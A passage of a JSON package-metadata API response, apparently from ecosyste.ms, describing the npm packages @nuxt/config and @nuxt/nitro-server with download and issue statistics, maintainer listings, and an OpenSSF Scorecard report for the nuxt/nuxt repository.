syste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2024-10-29T22:52:10.120Z","dependent_packages_count":28,"downloads":583200,"downloads_period":"last-month","dependent_repos_count":56795,"rankings":{"downloads":0.24388009961355075,"dependent_repos_count":0.12615550346381446,"dependent_packages_count":0.9049586174984062,"stargazers_count":0.15564167441745766,"forks_count":0.5232519525968256,"docker_downloads_count":0.4437801426250028,"average":0.39961133170250956},"purl":"pkg:npm/%40nuxt/config","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/config","docker_dependents_count":259,"docker_downloads_count":1376808,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/config","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/config/dependencies","status":null,"funding_links":["https://github.com/sponsors/nuxt","https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2024-10-29T15:44:34.308Z","issues_count":5866,"pull_requests_count":3404,"avg_time_to_close_issue":9336455.487222355,"avg_time_to_close_pull_request":862062.3253012048,"issues_closed_count":4166,"pull_requests_closed_count":3069,"pull_request_authors_count":452,"issue_authors_count":2655,"avg_comments_per_issue":5.084896010910331,"avg_comments_per_pull_request":2.099882491186839,"merged_pull_requests_count":2749,"bot_issues_count":1,"bot_pull_requests_count":1257,"past_year_issues_count":2725,"past_year_pull_requests_count":2325,"past_year_avg_time_to_close_issue":1465899.066102591,"past_year_avg_time_to_close_pull_request":278153.12717852095,"past_year_issues_closed_count":1881,"past_year_pull_requests_closed_count":2121,"past_year_pull_request_authors_count":310,"past_year_issue_authors_count":1437,"past_year_avg_comments_per_issue":3.424954128440367,"past_year_avg_comments_per_pull_request":2.0623655913978496,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":949,"past_year_merged_pull_requests_count":1933,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":819,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":227,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"pi0","count":127,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"manniL","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":77,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"antfu","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"Atinux","count":40,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"Hebilicious","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"BobbieGoede","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"dargmuesli","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"warflash","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"ineshbose","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"farnabaz","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"madebyfabian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"lihbr","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"arashsheyda","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"}],"active_maintainers":[{"login":"danielroe","count":497,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":153,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"manniL","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"userquin","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"BobbieGoede","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"pi0","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Atinux","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"madebyfabian","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"warflash","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"Hebilicious","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"lihbr","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"arashsheyda","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fconfig/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fconfig/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fconfig/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fconfig/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fconfig/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fconfig/codemeta","maintainers":[{"uuid":"pi0","login":"pi0","name":null,"email":"pyapar@gmail.com","url":null,"packages_count":689,"html_url":"https://www.npmjs.com/~pi0","role":null,"created_at":"2022-11-20T01:59:32.279Z","updated_at":"2022-11-20T01:59:32.279Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/pi0/packages"},{"uuid":"antfu","login":"antfu","name":null,"email":"anthonyfu117@hotmail.com","url":null,"packages_count":733,"html_url":"https://www.npmjs.com/~antfu","role":null,"created_at":"2022-11-20T01:59:32.267Z","updated_at":"2022-11-20T01:59:32.267Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/antfu/packages"},{"uuid":"atinux","login":"atinux","name":null,"email":"atinux@gmail.com","url":null,"packages_count":378,"html_url":"https://www.npmjs.com/~atinux","role":null,"created_at":"2022-11-20T01:59:32.273Z","updated_at":"2022-11-20T01:59:32.273Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/atinux/packages"},{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2022-11-20T01:59:32.297Z","updated_at":"2022-11-20T01:59:32.297Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-08-19T18:27:02.293Z","updated_at":"2023-08-19T18:27:02.293Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":12367247,"name":"@nuxt/nitro-server","ecosystem":"npm","description":"Nitro server integration for Nuxt","homepage":"https://nuxt.com","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":17,"first_release_published_at":"2025-10-09T08:22:38.892Z","latest_release_published_at":"2026-05-10T23:50:29.568Z","latest_release_number":"4.4.5","last_synced_at":"2026-05-11T01:23:06.024Z","created_at":"2025-10-09T08:23:05.471Z","updated_at":"2026-05-11T01:23:06.025Z","registry_url":"https://www.npmjs.com/package/@nuxt/nitro-server","install_command":"npm install @nuxt/nitro-server","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"4.4.5","3x":"3.21.5"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-04-29T23:50:20.000Z","size":137431,"stargazers_count":60131,"open_issues_count":887,"forks_count":5588,"subscribers_count":774,"default_branch":"main","last_synced_at":"2026-04-30T01:14:24.889Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-04-30T00:02:56.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":321,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32596531,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-03T22:12:39.696Z","status":"online","status_checked_at":"2026-05-04T02:00:06.625Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-05-11T01:23:02.160Z","dependent_packages_count":0,"downloads":3707124,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":23.694630460603825,"dependent_packages_count":34.17956967528005,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":28.937100067941937},"purl":"pkg:npm/%40nuxt/nitro-server","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/nitro-server","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/nitro-server","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/nitro-server/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-04-29T15:00:10.594Z","issues_count":6012,"pull_requests_count":6873,"avg_time_to_close_issue":11687876.257486388,"avg_time_to_close_pull_request":788508.7928300017,"issues_closed_count":4403,"pull_requests_closed_count":6053,"pull_request_authors_count":592,"issue_authors_count":3405,"avg_comments_per_issue":4.152361942781105,"avg_comments_per_pull_request":2.4965808235122946,"merged_pull_requests_count":5387,"bot_issues_count":12,"bot_pull_requests_count":2974,"past_year_issues_count":569,"past_year_pull_requests_count":797,"past_year_avg_time_to_close_issue":619953.7635135135,"past_year_avg_time_to_close_pull_request":235897.91202872532,"past_year_issues_closed_count":296,"past_year_pull_requests_closed_count":557,"past_year_pull_request_authors_count":102,"past_year_issue_authors_count":437,"past_year_avg_comments_per_issue":2.2530755711775043,"past_year_avg_comments_per_pull_request":3.1442910915934754,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":271,"past_year_merged_pull_requests_count":485,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1325,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url